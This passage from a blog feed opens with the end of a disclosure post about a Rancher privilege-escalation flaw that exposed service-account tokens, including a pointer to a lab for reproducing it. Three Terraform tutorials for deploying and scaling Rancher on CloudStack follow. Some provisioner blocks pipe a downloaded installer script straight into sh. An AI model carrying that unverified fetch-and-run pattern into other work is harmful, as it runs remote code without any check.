</code></pre><figcaption><p><span style="white-space: pre-wrap;">Powering off one of the nodes</span></p></figcaption></figure><figure class="kg-card kg-image-card"><img src="https://fe.ax/content/images/2022/11/image-6.png" class="kg-image" alt loading="lazy" width="725" height="252" srcset="https://fe.ax/content/images/size/w600/2022/11/image-6.png 600w, https://fe.ax/content/images/2022/11/image-6.png 725w" sizes="(min-width: 720px) 720px"></figure><h2 id="the-new-way">The new way</h2><p>It&apos;s clear this token shouldn&apos;t be exposed to regular users. That&apos;s why the status field <em>serviceAccountToken </em>is being replaced by the <em>serviceAccountTokenSecret </em>field. This way, a separate privilege is needed to access the secret, which the regular user doesn&apos;t have.</p><p>This change can be seen in the following commit.</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/rancher/rancher/commit/05fab40d32dae197d112d54412464686d43a5fb1"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Migrate cluster service account tokens to secrets &#xB7; rancher/rancher@05fab40</div><div class="kg-bookmark-description">Complete container management platform. Contribute to rancher/rancher development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">rancher</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/d8a3b20435ea994f4fb710ad1a63d64f5c18435fa25fa514b2d1f9ac3211f93c/rancher/rancher/commit/05fab40d32dae197d112d54412464686d43a5fb1" alt></div></a></figure><p>If we upgrade Rancher to 2.6.7, we&apos;ll see the token&apos;s value disappear, and a new field will appear.</p><h2 id="reproducing-the-issue">Reproducing the issue</h2><p>Reading can be boring, so I wrote the post keeping in mind you want to follow along. This is a very easy exploit and, therefore, easily reproduced. I provide a Terraform module to set up a vulnerable Rancher cluster quickly. You can <a href="https://github.com/fe-ax/tf-cve-2021-36782">find it here</a>. It works on DigitalOcean, and the only thing you should need to fill in is your API key.</p><p>To reproduce the issue. Let&apos;s spin up a new Kubernetes cluster and Rancher instance running version 2.6.6. Clone the above git repository to your local Linux machine and make sure you&apos;ve got Terraform installed. I&apos;ve used version 1.1.6 and later 1.3.5, so it doesn&apos;t matter which version you use.</p><h2 id="conclusion">Conclusion</h2><p>This vulnerability has two sides. On the one hand, you still need to gain access to Rancher. On the other hand, it certainly doesn&apos;t help with the insider threat when privileges are this easily escalated.</p><p>In projects as big as Rancher, one change can potentially open doors that weren&apos;t supposed to be opened. This door can stay open for a very long time until someone notices it.</p><p>This was a great experience, from discovery to exploitation. I understand the gravity of the issue, but it was thrilling.</p><p>Thanks to Rancher for the great open-source tool, Guilherme from Rancher for the quick response to the issue and for keeping me updated, and my colleague Mike for checking and confirming the discovery and figuring out a way to bypass the firewall using the UI shell.</p>]]></content:encoded></item><item><title><![CDATA[From Terraform monolith to modules]]></title><description><![CDATA[Moving config from a large monolith config to multiple modules. I'm looking into taking run order control and errors I ran into.]]></description><link>https://fe.ax/terraform-monolith-to-modules/</link><guid isPermaLink="false">62aa367b094121017a6b401e</guid><category><![CDATA[Terraform]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 13 Apr 2022 21:08:03 GMT</pubDate><content:encoded><![CDATA[<p>In the last two posts, I&apos;ve explored Terraform and its terraforming capabilities in enabling quick, repeatable environments in the cloud. This time I want to take the three previous subdirectories and put an over-arcing Terraform configuration which will use the other directories as modules. The config will probably allow me to easily manage their dependencies on each other.</p><p>Let&apos;s first start by getting a main.tf that tries to run them from the parent directory.</p><figure class="kg-card kg-code-card"><pre><code class="language-HCL">module &quot;nodes&quot; {
  source = &quot;./nodes&quot;
}

module &quot;rke&quot; {
  source = &quot;./rke&quot;
}

module &quot;rancher&quot; {
  source = &quot;./rancher&quot;
}</code></pre><figcaption>The over-arcing main Terraform configuration</figcaption></figure><p>Just run <code>terraform init</code> and <code>terraform plan</code> and you&apos;ll notice it won&apos;t work immediately.</p><figure class="kg-card kg-code-card"><pre><code>Error: Unable to find remote state
 
   with module.rke.data.terraform_remote_state.nodes,
   on rke/main.tf line 19, in data &quot;terraform_remote_state&quot; &quot;nodes&quot;:
   19: data &quot;terraform_remote_state&quot; &quot;nodes&quot; {
 
 No stored state was found for the given workspace in the given backend.
</code></pre><figcaption>Error because of missing dependencies</figcaption></figure><p>We first need the cloud machines to run and generate the relevant configs before we can plan further. In this case, we&apos;re hitting a dependency order problem.</p><p>First, let&apos;s clean things up in the subdirectories. I just removed all Terraform generated stuff like this:</p><figure class="kg-card kg-code-card"><pre><code class="language-bash">rm -rf terraform.tfstate* .terraform*
 
# only for RKE
rm -rf kubeconfig.yaml rke_debug.log </code></pre><figcaption>Remove unnecessary files</figcaption></figure><p>Be sure that you&apos;ve deleted all infrastructure. It&apos;s easier when you&apos;ve created a separate account.</p><p>Next, I&apos;ve added the <code>depends_on</code> argument, and this resulted in another error:</p><figure class="kg-card kg-code-card"><pre><code> Error: Module module.rancher contains provider configuration
 
 Providers cannot be configured within modules using count, for_each or depends_on.


 Error: Module module.rke contains provider configuration
 
 Providers cannot be configured within modules using count, for_each or depends_on.</code></pre><figcaption>Error after depends_on</figcaption></figure><p>It wasn&apos;t a good idea to have the providers defined in the modules anyway. Let&apos;s rip them out and give them a nice place of their own.</p><p>I moved all provider configs into their own file, which caused multiple issues, which I will write below.</p><p>If you get the following error:</p><pre><code>Error: Failed to query available provider packages

Could not retrieve the list of available versions for provider hashicorp/rke: provider registry registry.terraform.io does not have a provider named registry.terraform.io/hashicorp/rke

Did you intend to use rancher/rke? If so, you must specify that source address in each module which requires that provider. To see which modules are currently depending on hashicorp/rke, run the following
command:
    terraform providers</code></pre><p>You should add the <code>required_providers</code> to the modules themselves too. Just don&apos;t add the <code>provider</code> block.</p><p>The first plan immediately showed the following issue:</p><pre><code>Error: Provider configuration not present

To work with module.rancher.rancher2_bootstrap.admin its original provider configuration at module.rancher.provider[&quot;registry.terraform.io/rancher/rancher2&quot;].bootstrap is required, but it has been removed.

This occurs when a provider configuration is removed while objects created by that provider still exist in the state. Re-add the provider configuration to destroy module.rancher.rancher2_bootstrap.admin,
after which you can remove the provider configuration again.</code></pre><p>To fix this, make the module block of Rancher look like this:</p><pre><code class="language-hcl">module &quot;rancher&quot; {
  source = &quot;./modules/rancher&quot;
  depends_on = [
    module.rke
  ]
  providers = {
    rancher2.bootstrap = rancher2.bootstrap
    rancher2.admin = rancher2.admin    
  }
}</code></pre><p>And in the Rancher main.tf:</p><pre><code class="language-hcl">terraform {
  required_providers {
    local = {
      source  = &quot;hashicorp/local&quot;
      version = &quot;2.2.2&quot;
    }
    rancher2 = {
      source  = &quot;rancher/rancher2&quot;
      version = &quot;1.22.2&quot;
      configuration_aliases = [ rancher2.bootstrap, rancher2.admin ]
    }
    helm = {
      source  = &quot;hashicorp/helm&quot;
      version = &quot;2.4.1&quot;
    }
  }
}</code></pre><p>Now let&apos;s run <code>terraform apply</code> for the fourth time and have my fingers crossed.</p><p>It didn&apos;t work, and the RKE module stopped when it couldn&apos;t read the remote state of &quot;cloud&quot;, which shouldn&apos;t be needed anymore.</p><p>The error:</p><pre><code>No stored state was found for the given workspace in the given backend.</code></pre><p>I&apos;ve changed the following lines:</p><pre><code># In file rke.tf
 - for_each = data.terraform_remote_state.cloud.outputs.ip_address
 + for_each = var.rke_cluster_ips

# RKE module in file 00-main.tf
module &quot;rke&quot; {
  source = &quot;./modules/rke&quot;
  depends_on = [
    module.cloud
  ]

  rke_cluster_ips = module.cloud.ip_address
}</code></pre><p>Running apply again gave me some more relative directory issues, which were easily fixed by adding <code>${path.module}/</code> or just removing the <code>../</code></p><p>The final directory structure is this:</p><pre><code>.
&#x251C;&#x2500;&#x2500; modules
&#x2502;   &#x251C;&#x2500;&#x2500; cloud
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; local_instances.tf
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; provision-docker.sh
&#x2502;   &#x2502;   &#x2514;&#x2500;&#x2500; security_groups.tf
&#x2502;   &#x251C;&#x2500;&#x2500; rancher
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; certmanager.tf
&#x2502;   &#x2502;   &#x251C;&#x2500;&#x2500; main.tf
&#x2502;   &#x2502;   &#x2514;&#x2500;&#x2500; rancher.tf
&#x2502;   &#x2514;&#x2500;&#x2500; rke
&#x2502;       &#x251C;&#x2500;&#x2500; main.tf
&#x2502;       &#x2514;&#x2500;&#x2500; rke.tf
&#x251C;&#x2500;&#x2500; 00-main.tf
&#x251C;&#x2500;&#x2500; 01-cloud.tf
&#x251C;&#x2500;&#x2500; 02-rke.tf
&#x251C;&#x2500;&#x2500; 03-rancher-bootstrap.tf
&#x251C;&#x2500;&#x2500; rke_debug.log
&#x251C;&#x2500;&#x2500; terraform.tfstate
&#x251C;&#x2500;&#x2500; terraform.tfstate.backup
&#x251C;&#x2500;&#x2500; test_rsa
&#x2514;&#x2500;&#x2500; test_rsa.pub

4 directories, 18 files</code></pre><h2 id="conclusion">Conclusion</h2><p>With <code>terraform apply</code> running, we&apos;ve squashed three runs into one single run. We can hit deploy and get something to drink, pet the cat, and return to an entirely freshly provisioned environment.</p><p></p>]]></content:encoded></item><item><title><![CDATA[Efficiently scaling RKE with Terraform]]></title><description><![CDATA[Efficiently scaling RKE using Terraform by using dynamic block and count for loops.]]></description><link>https://fe.ax/efficiently-scaling-rke-with-terraform/</link><guid isPermaLink="false">62aa367b094121017a6b401c</guid><category><![CDATA[Terraform]]></category><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Sat, 26 Mar 2022 15:20:26 GMT</pubDate><content:encoded><![CDATA[<p>We&apos;ve set up a quick start setup with one of everything in the previous blog post. One of everything is excellent for a quick test or check, but you might want to up those rookie numbers. In this blog post, we&apos;ll make it scale very easily.</p><p>If you haven&apos;t destroyed your previous setup, you should. Create a new clean account if you can&apos;t or don&apos;t want to. It&apos;s essential to have your infrastructure set up reproducible at every change from the ground up, and that&apos;s why we start from the beginning.</p><h2 id="creating-multiple-instances">Creating multiple instances</h2><p>First, let&apos;s move the instance definition to its own file called <code>local_instances.tf</code>. I&apos;ve also changed the resource name to &quot;local&quot;.</p><p>Now let&apos;s scale this instance up to two. We start with two and will scale up to three at the end to see what happens while it&apos;s in production. To scale it up easily, we need to add &#xA0;<code>count = 2</code> to the instance configuration. However, more changes are required in the other parts of the Terraform config to make it work with the scaled instance.</p><p>After adding <code>count = 2</code> to the instance config, I&apos;ve also changed the <code>name = &quot;test&quot;</code> to <code>name = &quot;local-node${count.index + 1}&quot;</code> to reflect the name of the node in the CloudStack UI.</p><p>The complete <code>local_instances.tf</code> file now looks like this:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_instance&quot; &quot;local_nodes&quot; {
  count              = 2
  name               = &quot;local-node${count.index + 1}&quot;
  service_offering   = &quot;VM 4G/4C&quot;
  network_id         = &quot;g56cf51f-93ab-2351-a222-9c9525dc8533&quot;
  template           = &quot;Ubuntu 20.04&quot;
  zone               = &quot;zone.ams.net&quot;
  keypair            = cloudstack_ssh_keypair.testkey.id
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
  root_disk_size     = 20

  connection {
    type        = &quot;ssh&quot;
    user        = &quot;root&quot;
    private_key = file(&quot;../test_rsa&quot;)
    host        = self.ip_address
  }
  
  provisioner &quot;remote-exec&quot; {
    inline  = [&quot;curl https://releases.rancher.com/install-docker/20.10.sh | sh&quot;]
  }
}</code></pre><figcaption>New local_instances.tf file</figcaption></figure><p>Now is the time to set up the DNS of the domain you&apos;ll use for Rancher. </p><h2 id="dynamic-rke-nodes">Dynamic RKE nodes</h2><p>To let RKE know it needs to install three nodes instead of one, we need to expose three IP addresses. To automate this, we&apos;ll use a wildcard array.</p><p>The outputs block is now changed to the following:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">output &quot;ip_address&quot; {
  value = cloudstack_instance.local_nodes[*].ip_address
}</code></pre><figcaption>Output data</figcaption></figure><p>Now let&apos;s apply this config first. Terraform would remove the old node if you didn&apos;t remove it already. Terraform will create two new nodes.</p><p>To change RKE to dynamically add the nodes based on the output data of Cloud, we need to add a <a href="https://www.terraform.io/language/expressions/dynamic-blocks">dynamic block</a>.</p><pre><code class="language-hcl">resource &quot;rke_cluster&quot; &quot;cluster_local&quot; {
  dynamic &quot;nodes&quot; {
    for_each = data.terraform_remote_state.cloud.outputs.ip_address
    content {
      address = nodes.value
      user    = &quot;root&quot;
      role    = [&quot;controlplane&quot;, &quot;worker&quot;, &quot;etcd&quot;]
      ssh_key = file(&quot;../test_rsa&quot;)
    }
  }
}</code></pre><p>The word &quot;nodes&quot; on the second line indicates the name of the block, but also the iterator name. The naming can be confusing, but the dynamic block label should match the wanted block&apos;s name. You can change the iterator name by adding <code>iterator = &quot;anothername&quot;</code> before <code>content</code>.</p><p>Before you run <code>terraform plan</code>, be sure to delete the <code>terraform.tfstate</code> file to start over. The removal is necessary because the old RKE cluster doesn&apos;t exist anymore. You can also remove it with <code>terraform state rm</code>.</p><p> When you run <code>terraform plan</code> you&apos;ll see it dynamically created the <code>nodes</code> blocks.</p><pre><code class="language-hcl">      + nodes {
          + address        = &quot;1.2.3.4&quot;
          + role           = [
              + &quot;controlplane&quot;,
              + &quot;worker&quot;,
              + &quot;etcd&quot;,
            ]
          + ssh_agent_auth = (known after apply)
          + ssh_key        = (sensitive value)
          + user           = (sensitive value)
        }
      + nodes {
          + address        = &quot;1.2.3.5&quot;
          + role           = [
              + &quot;controlplane&quot;,
              + &quot;worker&quot;,
              + &quot;etcd&quot;,
            ]
          + ssh_agent_auth = (known after apply)
          + ssh_key        = (sensitive value)
          + user           = (sensitive value)
        }
    }</code></pre><p>Before we apply this config, we need to open up the firewall between them.</p><h2 id="security-groups">Security groups</h2><p> To allow communication between the RKE nodes, we need to open up the firewall to each other and the world. I&apos;ve created the following security group rules based on this <a href="https://rancher.com/docs/rke/latest/en/os/#ports">page from Rancher</a>.</p><pre><code class="language-hcl">resource &quot;cloudstack_security_group_rule&quot; &quot;Default-SG-RKEs-Ruleset&quot; {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [for s in cloudstack_instance.local_nodes : format(&quot;%s/32&quot;, s.ip_address)]
    protocol  = &quot;tcp&quot;
    ports     = [&quot;2379&quot;, &quot;2380&quot;, &quot;10250&quot;, &quot;6443&quot;]
  }

  rule {
    cidr_list = [for s in cloudstack_instance.local_nodes : format(&quot;%s/32&quot;, s.ip_address)]
    protocol  = &quot;udp&quot;
    ports     = [&quot;8472&quot;]
  }
}</code></pre><p>I&apos;ve also added <code>30000-32767</code> to <code>Default-SG-Home-Ruleset</code>.</p><p>Let&apos;s apply the cloud configuration now. You&apos;ll only create a new security_group_rule.</p><h2 id="scaling-rke">Scaling RKE</h2><p>Now that the firewall is set up, you can run <code>terraform apply</code>. Once the two-node RKE cluster is up. Check whether it functions correctly using the created <code>kubeconfig.yaml</code> file.</p><pre><code class="language-shell-session">marco@DESKTOP-WS:~/terra/rke$ export KUBECONFIG=&quot;./kubeconfig.yaml&quot;
marco@DESKTOP-WS:~/terra/rke$ kubectl get nodes
NAME            STATUS   ROLES                      AGE   VERSION
1.2.3.4         Ready    controlplane,etcd,worker   46m   v1.21.7
1.2.3.5         Ready    controlplane,etcd,worker   46m   v1.21.7</code></pre><p>Now let&apos;s check if everything will work as expected when we bump the <code>count = 2</code> to <code>count = 3</code>! First, move back to the Cloud config. Then up the count and run apply again.</p><pre><code class="language-hcl">Plan: 1 to add, 1 to change, 0 to destroy.

Changes to Outputs:
  ~ ip_address = [
        # (1 unchanged element hidden)
        &quot;1.2.3.5&quot;,
      + (known after apply),
    ]</code></pre><p>It seems like one extra instance is created. We also see that Terraform recreated the security rule, which could form an issue in high traffic production usage. I&apos;d suggest using dynamic block configuration to fix this issue maybe.</p><p>Perform the apply command. Watch the extra node, node3, be created and move to the RKE directory.</p><p>Applying the RKE config looks slightly off, and I think this is caused by the changing order of IP addresses that come from Cloud&apos;s output. We could change this into a mapped value, which could also come in handy to set the node_name, which is missing.</p><p>After 3 minutes and 35 seconds, the cluster is expanded. Let&apos;s check the node uptime ages.</p><pre><code class="language-shell-session">local_sensitive_file.kube_config_yaml: Creating...
local_sensitive_file.kube_config_yaml: Creation complete after 0s [id=f5e0de88e06ce7c347247247f69d69a1268830732]

Apply complete! Resources: 1 added, 1 changed, 1 destroyed.
marco@DESKTOP-WS:~/tests/rke$ kubectl get nodes
NAME            STATUS   ROLES                      AGE    VERSION
1.2.3.4         Ready    controlplane,etcd,worker   60m    v1.21.7
1.2.3.5         Ready    controlplane,etcd,worker   60m    v1.21.7
1.2.3.6         Ready    controlplane,etcd,worker   103s   v1.21.7
marco@DESKTOP-WS:~/tests/rke$ kubectl get pods -n ingress-nginx
NAME                             READY   STATUS    RESTARTS   AGE
nginx-ingress-controller-88pf4   1/1     Running   0          62m
nginx-ingress-controller-h2glc   1/1     Running   0          4m35s
nginx-ingress-controller-srkwg   1/1     Running   0          62m</code></pre><h2 id="conclusion">Conclusion</h2><p>The cluster is scaled up without downtime to the running pods efficiently. I would implement a couple of more changes to the configuration before taking this to a production level. For example, you could:</p><ul><li>Move it to modules and include these three directories from there</li><li>Have your state files in an S3 bucket</li><li>Moving variables to a separate tfvars file, making the config setup-agnostic</li><li>Mapping the IP addresses to their corresponding node-names</li></ul><p></p>]]></content:encoded></item><item><title><![CDATA[Rancher with Terraform on CloudStack]]></title><description><![CDATA[Setting up a Rancher environment running on RKE using Terraform. In this blog post, we'll build the Terraform config from scratch.]]></description><link>https://fe.ax/rancher-with-terraform-on-cloudstack/</link><guid isPermaLink="false">62aa367b094121017a6b401b</guid><dc:creator><![CDATA[marco]]></dc:creator><pubDate>Wed, 23 Mar 2022 22:15:22 GMT</pubDate><content:encoded><![CDATA[<p>I want to automate everything I can. Terraform is one of the automation tools I&apos;ve checked out in the past but not thoroughly explored yet. After playing with AWS and Terraform for a while, I became worried I&apos;d let some resources run wild, and they&apos;d start billing my credit card like crazy. I got access to a CloudStack environment, which is fantastic, and decided to build a Rancher cluster against it with Terraform. I&apos;m going to document my journey here in one or multiple posts.</p><p>Terraform is interesting. It allows you to create infrastructures from scratch while also removing every trace of its existence in seconds. Creating and destroying enables the flexibility to spin up a cluster when needed and break it down when finished.</p><p>This blog post will use Terraform to set up a Rancher server running on RKE, which we deploy on CloudStack.</p><p><em>And we&apos;re going to avoid having to do even a single task manually.</em></p><h2 id="creating-the-first-vm">Creating the first VM</h2><p>First things first, I needed a VM on CloudStack. After setting up API keys in my account and writing down the Terraform <a href="https://registry.terraform.io/providers/cloudstack/cloudstack/latest/docs">CloudStack provider&apos;s</a> bare minimum, I added the first <a href="https://registry.terraform.io/providers/cloudstack/cloudstack/latest/docs/resources/instance">CloudStack instance</a> resource.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  required_providers {
    cloudstack = {
      source = &quot;cloudstack/cloudstack&quot;
      version = &quot;0.4.0&quot;
    }
  }
}

provider &quot;cloudstack&quot; {
  api_url    = &quot;https://cloud.url/zone/api&quot;
  api_key    = &quot;api_key&quot;
  secret_key = &quot;secret_key&quot;
}

resource &quot;cloudstack_instance&quot; &quot;local_nodes&quot; {
  name             = &quot;local-node&quot;
  service_offering = &quot;VM 4G/4C&quot;
  network_id       = &quot;g56cf51f-93ab-2351-a222-9c9525dc8533&quot;
  template         = &quot;Ubuntu 20.04&quot;
  zone             = &quot;zone.ams.net&quot;
  root_disk_size   = 20 # You&apos;ll need at least 10GB of space
  expunge          = true # This removes the VM completely after destroy
}</code></pre><figcaption>The Terraform configuration</figcaption></figure><p>To initialize Terraform and let it download the needed information and binaries to use the requested providers, we run <code>terraform init</code>. All that&apos;s left to do to see something running then is to run <code>terraform apply</code>.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">Terraform used the selected providers to generate the following execution plan. Resource actions are indicated with the following symbols:
  + create

Terraform will perform the following actions:

  # cloudstack_instance.test will be created
  + resource &quot;cloudstack_instance&quot; &quot;test&quot; {
      + display_name     = (known after apply)
      + expunge          = true
      + group            = (known after apply)
      + id               = (known after apply)
      + ip_address       = (known after apply)
      + name             = &quot;test&quot;
      + network_id       = &quot;g56cf51f-93ab-2351-a222-9c9525dc8533&quot;
      + project          = (known after apply)
      + root_disk_size   = 20
      + service_offering = &quot;VM 4G/4C&quot;
      + start_vm         = true
      + tags             = (known after apply)
      + template         = &quot;Ubuntu 20.04&quot;
      + zone             = &quot;zone.ams.net&quot;
    }

Plan: 1 to add, 0 to change, 0 to destroy.

Do you want to perform these actions?
  Terraform will perform the actions described above.
  Only &apos;yes&apos; will be accepted to approve.

  Enter a value: yes

cloudstack_instance.test: Creating...
cloudstack_instance.test: Still creating... [10s elapsed]
cloudstack_instance.test: Creation complete after 10s [id=9c9525dc8533-2592-450d-a774-g56cf51f]</code></pre><figcaption>Terraform apply result</figcaption></figure><p>Cool! The first machine is running, as can be seen from the UI. You can find the IP in the UI or by running <code>terraform show</code>. You&apos;ll likely get no response when you ping this machine. That&apos;s because the firewall still denies all traffic.</p><h2 id="setting-up-the-security-groups">Setting up the security groups</h2><p>To be able to access the machine, you&apos;ll have to add rules to the default security group. You can read more about them <a href="http://docs.cloudstack.apache.org/en/latest/adminguide/networking/security_groups.html">here</a>. Adding rules can be done manually, but so can everything else, so we&apos;re using Terraform.</p><p>I&apos;ve added the following <a href="https://registry.terraform.io/providers/cloudstack/cloudstack/latest/docs/resources/security_group">security group</a> and two <a href="https://registry.terraform.io/providers/cloudstack/cloudstack/latest/docs/resources/security_group_rule">security group rules</a> in a new file called <code>security_groups.tf</code>. Terraform will read all <code>*.tf files</code> in the directory, so we don&apos;t have to worry about including them in <code>main.tf</code>. The world can ping the machine with these rules, but only we can access SSH.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_security_group&quot; &quot;Default-SG&quot; {
  name        = &quot;Default-SG&quot;
  description = &quot;Test SG for terraform tests&quot;
}

resource &quot;cloudstack_security_group_rule&quot; &quot;Default-SG-ICMP-Ruleset&quot; {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [&quot;0.0.0.0/0&quot;]
    protocol  = &quot;icmp&quot;
    icmp_code = -1
    icmp_type = -1
  }
}

resource &quot;cloudstack_security_group_rule&quot; &quot;Default-SG-Home-SSH-Ruleset&quot; {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [&quot;1.2.3.4/32&quot;] # Your IP address
    protocol  = &quot;tcp&quot;
    ports     = [&quot;22&quot;]
  }
}</code></pre><figcaption>The security groups</figcaption></figure><p>When Terraform creates a resource, it exports some attributes about it, like the ID of the security group. We can use the ID exported by the <em>security group resource</em> to refer to it from the <em>security group rule</em>. This way, CloudStack knows to which security group a ruleset belongs.</p><p>Don&apos;t worry about the order of creation. Terraform knows when references depend on each other and creates the needed resources first.</p><p>To make the machine use this security group, we must add it to its instance definition.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_instance&quot; &quot;test&quot; {
...
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
  
  connection {
    type        = &quot;ssh&quot;
...
  }</code></pre><figcaption>Adding the security_group_ids</figcaption></figure><p>Note that changing the security group of an instance results in replacing the machine.</p><blockquote>Once a VM is assigned to a security group, it remains in that group for its entire lifetime; you can not move a running VM from one security group to another.</blockquote><p>Which I find annoying.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">Terraform will perform the following actions:

  # cloudstack_instance.test must be replaced
-/+ resource &quot;cloudstack_instance&quot; &quot;test&quot; {
      ~ display_name       = &quot;test&quot; -&gt; (known after apply)
      + group              = (known after apply)
      ~ id                 = &quot;9c9525dc8533-2592-450d-a774-g56cf51f&quot; -&gt; (known after apply)
      ~ ip_address         = &quot;5.6.7.8&quot; -&gt; (known after apply)
        name               = &quot;test&quot;
      + project            = (known after apply)
      ~ root_disk_size     = 8 -&gt; (known after apply)
      + security_group_ids = [
          + &quot;ef6c8192-2795-440c-8774-1be8a969afd1&quot;,
        ] # forces replacement
      ~ tags               = {} -&gt; (known after apply)
        # (7 unchanged attributes hidden)
    }

Plan: 1 to add, 0 to change, 1 to destroy.</code></pre><figcaption>Terraform apply</figcaption></figure><p>Applying the new configuration sets up a new machine with the changed security group ID. We can ping and access the SSH port but cannot yet login. </p><h2 id="adding-keys-to-access-the-machine">Adding keys to access the machine</h2><p>To gain SSH access to the server we just created, we&apos;ve to give CloudStack a keypair to include when bootstrapping the machine.</p><p>I&apos;ve created an RSA key pair using <code>ssh-keygen -t rsa</code> and added the following to the <code>main.tf</code>. You can also use <code>~/.ssh/id_rsa.pub</code> of course.</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_instance&quot; &quot;test&quot; {
...
  zone               = &quot;zone.ams.net&quot;
  keypair            = cloudstack_ssh_keypair.testkey.id # This line
  expunge            = true
  security_group_ids = [cloudstack_security_group.Default-SG.id]
...
}

resource &quot;cloudstack_ssh_keypair&quot; &quot;testkey&quot; {
  name       = &quot;testkey&quot;
  public_key = &quot;${file(&quot;test_rsa.pub&quot;)}&quot;
}</code></pre><figcaption>Add SSH keys to CloudStack.</figcaption></figure><p>Adding the key after the machine is created should be possible, but something goes wrong every time I update it. I don&apos;t believe that feature is working correctly right now, so I decided to destroy and re-apply everything.</p><p>Now I&apos;m able to SSH into the machine using my <code>test_rsa</code> key. Let&apos;s set up the requirements for an RKE cluster.</p><h2 id="installing-the-required-packages">Installing the required packages</h2><p>I want to provision the server automatically with the needed docker packages. We could use <a href="https://www.ansible.com/">Ansible</a> for this or have a separate process to create perfect images with <a href="https://packer.io">Packer</a>, but let&apos;s stick to Terraform.</p><p>I&apos;ve added the following to my <code>main.tf</code></p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">  connection {
    type        = &quot;ssh&quot;
    user        = &quot;root&quot;
    private_key = file(&quot;test_rsa&quot;)
    host        = self.ip_address
  }
  
  provisioner &quot;remote-exec&quot; {
    inline  = [&quot;curl https://releases.rancher.com/install-docker/20.10.sh | sh&quot;]
  }</code></pre><figcaption>Adding remote-exec provisioner</figcaption></figure><p>Terraform will not execute this directly. But don&apos;t worry, we don&apos;t have to fall back to <em>manually logging in and running the commands</em>. Lets just <code>terraform destroy</code> and <code>terraform apply</code> again :)</p><p>You&apos;ll see that Terraform tries to connect to SSH before the machine is finished starting up, but once it is, the preparation script from Rancher starts running immediately and installs Docker.</p><h2 id="setting-up-rke">Setting up RKE</h2><p>Terraform can set up an RKE cluster on the machine you just created using the <a href="https://registry.terraform.io/providers/rancher/rke/latest/docs">RKE provider</a>. This setup will be a single node RKE cluster. I&apos;ve made another file named <code>rke.tf</code> which contains the following:</p><figure class="kg-card kg-code-card"><pre><code>provider &quot;rke&quot; {
  debug = true
  log_file = &quot;rke_debug.log&quot;
}

resource &quot;rke_cluster&quot; &quot;cluster_local&quot; {
  nodes {
    address = cloudstack_instance.test.ip_address
    user    = &quot;root&quot;
    role    = [&quot;controlplane&quot;, &quot;worker&quot;, &quot;etcd&quot;]
    ssh_key = file(&quot;test_rsa&quot;)
  }
}</code></pre><figcaption>Adding RKE provider config</figcaption></figure><p>I&apos;ve also added the following to the <code>main.tf</code> :</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">terraform {
  required_providers {
    cloudstack = {
      source = &quot;cloudstack/cloudstack&quot;
      version = &quot;0.4.0&quot;
    }
    # This part
    rke = {
      source = &quot;rancher/rke&quot;
      version = &quot;1.3.0&quot;
    }
  }
}</code></pre><figcaption>Adding RKE provider download</figcaption></figure><p>After which, you&apos;ll need to rerun <code>terraform init</code> to fetch the required provider.</p><p>When you run <code>terraform apply</code> now, you&apos;ll notice it says it wants to install an RKE cluster using Rancher&apos;s hyperkube version <code>v1.21.7-rancher1-1</code>. To use a newer version, you&apos;ll have to update a dependency in the RKE provider, but I&apos;ll explain how to do that in another separate blog post.</p><p>When you run <code>terraform apply</code> now, you&apos;ll notice an error:</p><blockquote>Failed running cluster err:[network] Can&apos;t access KubeAPI port [6443] on Control Plane host: 4.5.6.7</blockquote><p>The RKE provider can&apos;t connect to the machine&apos;s port 6443. Let&apos;s fix that by changing the <code>Home-Ruleset</code> in <code>security_groups.tf</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-hcl">resource &quot;cloudstack_security_group_rule&quot; &quot;Default-SG-Home-Ruleset&quot; {
  security_group_id = cloudstack_security_group.Default-SG.id

  rule {
    cidr_list = [&quot;1.2.3.4/32&quot;]
    protocol  = &quot;tcp&quot;
    ports     = [&quot;22&quot;, &quot;6443&quot;]
  }
}</code></pre><figcaption>Adding 6443 to rules</figcaption></figure><p>Now RKE should install just fine. If not, destroy and re-apply. If you keep having random issues, check the available disk space and <code>rke_debug.log</code>.</p><h2 id="getting-the-kubeconfigyaml">Getting the kubeconfig.yaml</h2><p>Of course, we want to access the RKE cluster from our terminal. We can see the kubeconfig yaml with <code>terraform show -json</code> but it&apos;s highly inefficient.</p><figure class="kg-card kg-code-card"><pre><code class="language-shell-session">marco@DESKTOP-WS:~/tests$ terraform show -json | jq &apos;.values[&quot;root_module&quot;][&quot;resources&quot;][] | select(.address == &quot;rke_cluster.cluster_local&quot;) | .values.kube_config_yaml&apos; -r
apiVersion: v1
kind: Config
clusters:
- cluster:
    api-version: v1
